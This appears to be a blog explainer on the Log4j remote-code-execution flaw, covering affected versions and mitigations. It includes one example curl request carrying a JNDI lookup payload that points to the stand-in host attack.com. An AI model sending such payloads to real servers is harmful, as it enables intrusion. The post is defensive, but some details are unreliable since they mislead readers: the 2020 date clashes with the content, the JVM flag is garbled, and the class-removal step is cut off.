The Log4j vulnerability affects everything from the cloud to developer tools and security devices. Here’s what to look for, according to the latest information.
What is Log4j?
Log4j vulnerability is a new zero day critical vulnerability discovered in open source Apache logging framework called “Log4j” which is used to log the activity within an Java application. This is a serious vulnerability that is triggered by an user sending a malicious payload as an request to the server running a Java application which is using Log4j package to record the activity. This can be triggered by sending a normal request along with payload like this
curl xxxxx -H 'X-Api-Version: ${jndi:ldap://attack.com/attack}The above curl sends out a request to XXXX server with the payload which calls a website or any ipaddress via Java Naming Directory interface. Instead of filtering out the payload, the JNDI directly calls the website “attack.com” via ldap protocol. This can be used to exploit any server running as any attacker can directly run commands on the server by downloading a script using this exploit command.
More about it can be seen here – https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228
How can hackers take advantage of Log4j’s vulnerability?
The Log4j flaw, disclosed by Apache last week, allows attackers to execute code remotely on a target computer, meaning that they can steal data, install malware or take control. Some cybercriminals have installed software that uses a hacked system to mine cryptocurrency, while others have developed malware that allows attackers to hijack computers for large-scale assaults on internet infrastructure.
Where is Log4j used?
The Log4j 2 library is used in enterprise Java software and according to the UK’s NCSC is included in Apache frameworks such as Apache Struts2, Apache Solr, Apache Druid, Apache Flink, and Apache Swift.
How widely is the Log4j flaw being exploited?
Security experts have warned that there are hundreds of thousands of attempts by hackers to find vulnerable devices; over 40 percent of corporate networks have been targeted according to one security company.
Which versions of the Log4j library are vulnerable?
Almost all versions of Log4j are vulnerable, starting from 2.0-beta9 to 2.14.1. The simplest and most effective protection method is to install the most recent version of the library, 2.15.0.
How to protect your server from Log4j attacks?
In accordance with the basic protection module [BSI2021a], an update to the current version 2.15.0 [APA2021] (gittag: 2.15.0-rc2 [GIT2021c]) of log4j should be ensured in all applications. Since updates of dependencies in Java applications often cannot be carried out promptly, the following mitigation measure should be taken until then:
The option "log4j2.formatMsgNoLookups" should be set to "true" by the Java Virtual Machine with the argument
"–Dlog4j2.formatMsgNoLookups = True" is started.Caution: This measure can impair the functionality of the application if the lookup function is actually used.
To protect earlier releases of Log4j (from 2.0-beta9 to 2.10.0), the library developers recommend removing the JndiLookup class from the classpath:How to prevent Log4j flaw being exploited
Though the log4j has come out with a newer version 2.15.0 in which the exploit is turned off. The best way to defend is to put in firewall rules that prevents anyone from sending inbound request via LDAP protocols to the critical servers.
You can download the latest package at this official link https://logging.apache.org/log4j/2.x/download.html
Alan Bradford
Jun 23, 2020
